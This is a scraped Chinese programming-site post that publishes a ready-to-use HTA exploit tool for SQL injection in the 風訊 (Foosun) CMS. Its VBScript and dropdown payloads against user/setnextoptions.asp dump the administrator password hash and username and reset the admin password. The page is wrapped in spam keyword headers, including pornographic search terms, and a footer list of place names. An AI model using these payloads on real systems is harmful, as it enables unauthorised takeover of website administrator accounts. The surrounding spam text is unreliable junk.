国产探花免费观看_亚洲丰满少妇自慰呻吟_97日韩有码在线_资源在线日韩欧美_一区二区精品毛片,辰东完美世界有声小说,欢乐颂第一季,yy玄幻小说排行榜完本

首頁 > 編程 > HTML > 正文

風訊注入exp(hta版)代碼發布

2020-01-25 19:40:24
字體:
來源:轉載
供稿:網友
風訊注入exp實例代碼,hta版的方便使用
 
<SCRIPT LANGUAGE="VBScript"> 
Sub Window_onLoad 
    window.resizeTo 450,380 
    window.moveTo 300, 300 
End Sub  
</SCRIPT> 

<SCRIPT LANGUAGE="VBScript"> 
Function getHTTPPage(Path) 
       t = GetBody(Path) 
       getHTTPPage = BytesToBstr(t, "GB2312") 
      document.getElementById("url").innerText=getHTTPPage 
End Function 
</script> 
<SCRIPT LANGUAGE="VBScript"> 
Function GetBody(url) 
      On Error Resume Next 
      Set Retrieval = CreateObject("Microsoft.XMLHTTP") 
      With Retrieval 
          .Open "Get", url, False, "", "" 
          .Send 
           GetBody = .ResponseBody 
      End With 
      Set Retrieval = Nothing 
End Function 

Function BytesToBstr(Body, Cset) 
      Dim objstream 
      Set objstream = CreateObject("adodb.stream") 
       objstream.Type = 1 
       objstream.Mode = 3 
       objstream.Open 
       objstream.Write Body 
       objstream.Position = 0 
       objstream.Type = 2 
       objstream.Charset = Cset 
       BytesToBstr = objstream.ReadText 
       objstream.Close 
      Set objstream = Nothing 
End Function 

</script> 

<title>by lcx</title> 
<input id="urlcode" NAME="urlcode" size="60" value="http://風訊url/user/setnextoptions.asp"> 
<select id="sql" name="sql" onchange=vbs:getHTTPPage(document.getElementById("urlcode").value+document.getElementById("sql").value)> 
<option value="">風訊sql版注入,至于其它備份shell的語句懶得寫了</option> 
<option value="?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理員密碼</option> 
<option value="?EquValue=1&ReqSql=select%201,Admin_Name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=1--")">暴管理員用戶名</option> 
<option value="?EquValue=1&ReqSql=select user;update FS_MF_ADMIN set ADMIN_pass_word='a0b923820dcc509a' where id=1--">更改管理員密碼為1</option> 
</select> 
<TEXTAREA id="url" NAME="url" ROWS="8" COLS="60"></TEXTAREA> 
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
主站蜘蛛池模板: 崇礼县| 巫山县| 凌海市| 桑日县| 万载县| 鲜城| 邢台市| 仁布县| 郎溪县| 调兵山市| 怀柔区| 惠州市| 通海县| 若羌县| 临江市| 庐江县| 湘潭县| 岳普湖县| 阿拉善右旗| 阿勒泰市| 西峡县| 广西| 古丈县| 金门县| 库尔勒市| 闽清县| 平原县| 若尔盖县| 常山县| 平阴县| 个旧市| 昆山市| 衡东县| 嘉荫县| 安徽省| 兰溪市| 遂宁市| 上高县| 菏泽市| 上高县| 奉化市|